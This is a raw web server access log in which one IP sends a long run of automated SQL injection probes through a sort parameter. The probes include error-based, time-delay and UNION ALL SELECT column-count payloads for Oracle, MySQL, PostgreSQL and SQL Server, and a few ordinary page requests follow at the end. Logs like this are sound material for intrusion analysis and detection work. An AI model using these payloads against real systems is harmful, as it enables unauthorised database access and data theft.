93.99.104.117 - - [06/Apr/2020:11:51:00 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%27%20AND%209011%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289011%3D9011%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28107%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27meZn%27%3D%27meZn&limit=15&page=1 HTTP/1.1" 200 2510 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:51:10 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%27%20AND%209011%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289011%3D9011%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28107%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27meZn%27%3D%27meZn&limit=15&page=1 HTTP/1.1" 200 2510 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:51:12 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%25%27%20AND%209011%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289011%3D9011%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28107%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27%25%27%3D%27&limit=15&page=1 HTTP/1.1" 200 2509 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:51:14 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%20AND%209011%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289011%3D9011%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28107%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29--%20FKMo&limit=15&page=1 HTTP/1.1" 200 2499 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:51:16 +0200] "POST /10227785?dir=ASC&mode=grid&order=%28SELECT%207600%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7162706b71%2C%28SELECT%20%28ELT%287600%3D7600%2C1%29%29%29%2C0x716a6b7671%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29&limit=15&page=1 HTTP/1.1" 200 2496 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:51:18 +0200] "POST /10227785?dir=ASC&mode=grid&order=%28SELECT%20CONCAT%280x7162706b71%2C%28SELECT%20%28ELT%287339%3D7339%2C1%29%29%29%2C0x716a6b7671%29%29&limit=15&page=1 HTTP/1.1" 200 2414 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:51:20 +0200] "POST /10227785?dir=ASC&mode=grid&order=%28SELECT%20%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288446%3D8446%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28107%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%29%29&limit=15&page=1 HTTP/1.1" 200 4061 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:51:23 +0200] "POST /10227785?dir=ASC&mode=grid&order=%28SELECT%20CHAR%28113%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28107%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%288720%3D8720%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28107%29%2BCHAR%28118%29%2BCHAR%28113%29%29&limit=15&page=1 HTTP/1.1" 200 2452 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:51:25 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%29%3BSELECT%20PG_SLEEP%285%29--&limit=15&page=1 HTTP/1.1" 200 2380 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:51:26 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%3BSELECT%20PG_SLEEP%285%29--&limit=15&page=1 HTTP/1.1" 200 2378 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:51:33 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%27%29%3BSELECT%20PG_SLEEP%285%29--&limit=15&page=1 HTTP/1.1" 200 2383 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:51:35 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%27%3BSELECT%20PG_SLEEP%285%29--&limit=15&page=1 HTTP/1.1" 200 2382 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:51:36 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%25%27%3BSELECT%20PG_SLEEP%285%29--&limit=15&page=1 HTTP/1.1" 200 2383 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:51:38 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--&limit=15&page=1 HTTP/1.1" 200 2385 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:51:39 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--&limit=15&page=1 HTTP/1.1" 200 2382 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:51:41 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%27%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--&limit=15&page=1 HTTP/1.1" 200 2387 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:51:43 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--&limit=15&page=1 HTTP/1.1" 200 2384 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:51:44 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%25%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--&limit=15&page=1 HTTP/1.1" 200 2388 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:51:46 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%29%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28115%29%7C%7CCHR%2870%29%7C%7CCHR%2882%29%7C%7CCHR%28104%29%2C5%29%20FROM%20DUAL--&limit=15&page=1 HTTP/1.1" 200 2439 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:51:48 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28115%29%7C%7CCHR%2870%29%7C%7CCHR%2882%29%7C%7CCHR%28104%29%2C5%29%20FROM%20DUAL--&limit=15&page=1 HTTP/1.1" 200 2438 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:51:50 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%27%29%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28115%29%7C%7CCHR%2870%29%7C%7CCHR%2882%29%7C%7CCHR%28104%29%2C5%29%20FROM%20DUAL--&limit=15&page=1 HTTP/1.1" 200 2442 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:51:52 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%27%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28115%29%7C%7CCHR%2870%29%7C%7CCHR%2882%29%7C%7CCHR%28104%29%2C5%29%20FROM%20DUAL--&limit=15&page=1 HTTP/1.1" 200 2441 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:51:54 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%25%27%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28115%29%7C%7CCHR%2870%29%7C%7CCHR%2882%29%7C%7CCHR%28104%29%2C5%29%20FROM%20DUAL--&limit=15&page=1 HTTP/1.1" 200 2443 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:51:56 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%29%20ORDER%20BY%201--%20SAFt&limit=15&page=1 HTTP/1.1" 200 2376 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:51:58 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%29%20UNION%20ALL%20SELECT%20NULL--%20SQQH&limit=15&page=1 HTTP/1.1" 200 2388 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:52:00 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%29%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20KivF&limit=15&page=1 HTTP/1.1" 200 2390 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:52:02 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20DfkC&limit=15&page=1 HTTP/1.1" 200 2389 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:52:04 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20dyFr&limit=15&page=1 HTTP/1.1" 200 2390 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:52:06 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20lSUB&limit=15&page=1 HTTP/1.1" 200 2391 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:52:08 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20wynV&limit=15&page=1 HTTP/1.1" 200 2391 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:52:10 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20fMgU&limit=15&page=1 HTTP/1.1" 200 2391 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:52:12 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20cUZF&limit=15&page=1 HTTP/1.1" 200 2392 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:52:14 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20sqtE&limit=15&page=1 HTTP/1.1" 200 2392 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:52:16 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20HCDP&limit=15&page=1 HTTP/1.1" 200 2393 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:52:18 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%20ORDER%20BY%201--%20umYI&limit=15&page=1 HTTP/1.1" 200 2373 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:52:20 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%20UNION%20ALL%20SELECT%20NULL--%20dCGV&limit=15&page=1 HTTP/1.1" 200 2384 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:52:23 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20LBgQ&limit=15&page=1 HTTP/1.1" 200 2388 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:52:25 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20JJDL&limit=15&page=1 HTTP/1.1" 200 2389 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:52:27 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20UKMQ&limit=15&page=1 HTTP/1.1" 200 2387 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:52:29 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20AhlE&limit=15&page=1 HTTP/1.1" 200 2386 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:52:31 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20QffY&limit=15&page=1 HTTP/1.1" 200 2389 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:52:33 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20asXN&limit=15&page=1 HTTP/1.1" 200 2387 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:52:35 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20Qaer&limit=15&page=1 HTTP/1.1" 200 2388 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:52:37 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20kSXN&limit=15&page=1 HTTP/1.1" 200 2389 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:52:39 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20FZPb&limit=15&page=1 HTTP/1.1" 200 2390 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:52:41 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%27%29%20ORDER%20BY%201--%20IroI&limit=15&page=1 HTTP/1.1" 200 2378 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:52:43 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%27%29%20UNION%20ALL%20SELECT%20NULL--%20zXAR&limit=15&page=1 HTTP/1.1" 200 2391 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:52:45 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20LCzd&limit=15&page=1 HTTP/1.1" 200 2393 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:52:47 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20mkbT&limit=15&page=1 HTTP/1.1" 200 2393 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:52:49 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20JVJv&limit=15&page=1 HTTP/1.1" 200 2395 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:52:51 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20dgTW&limit=15&page=1 HTTP/1.1" 200 2394 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:52:53 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20aDkk&limit=15&page=1 HTTP/1.1" 200 2394 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:52:55 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20TXQX&limit=15&page=1 HTTP/1.1" 200 2395 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:52:58 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20sFvI&limit=15&page=1 HTTP/1.1" 200 2395 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:53:00 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20Leiq&limit=15&page=1 HTTP/1.1" 200 2395 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:53:02 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20zHgc&limit=15&page=1 HTTP/1.1" 200 2396 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:53:04 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%27%20ORDER%20BY%201--%20WRSq&limit=15&page=1 HTTP/1.1" 200 2376 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:53:06 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%27%20UNION%20ALL%20SELECT%20NULL--%20YCmZ&limit=15&page=1 HTTP/1.1" 200 2388 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:53:08 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%27%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20HrLQ&limit=15&page=1 HTTP/1.1" 200 2390 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:53:10 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20wZKu&limit=15&page=1 HTTP/1.1" 200 2391 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:53:12 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20voXl&limit=15&page=1 HTTP/1.1" 200 2390 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:53:14 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20loJK&limit=15&page=1 HTTP/1.1" 200 2391 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
93.99.104.117 - - [06/Apr/2020:11:53:16 +0200] "POST /10227785?dir=ASC&mode=grid&order=name%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20PkRG&limit=15&page=1 HTTP/1.1" 200 2392 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)"
193.194.132.27 - - [06/Apr/2020:11:53:18 +0200] "GET /login HTTP/1.1" 200 2095 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko"
193.194.132.27 - - [06/Apr/2020:11:53:19 +0200] "GET /css/reset.css HTTP/1.1" 304 - "http://renault.2web.at/login" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko"
193.194.132.27 - - [06/Apr/2020:11:53:19 +0200] "GET /js/checkout.css HTTP/1.1" 304 - "http://renault.2web.at/login" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko"
193.194.132.27 - - [06/Apr/2020:11:53:19 +0200] "GET /css/prototip.css HTTP/1.1" 304 - "http://renault.2web.at/login" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko"
193.194.132.27 - - [06/Apr/2020:11:53:19 +0200] "GET /css/styles.css HTTP/1.1" 304 - "http://renault.2web.at/login" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko"
193.194.132.27 - - [06/Apr/2020:11:53:19 +0200] "GET /css/print.css HTTP/1.1" 200 543 "http://renault.2web.at/login" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko"
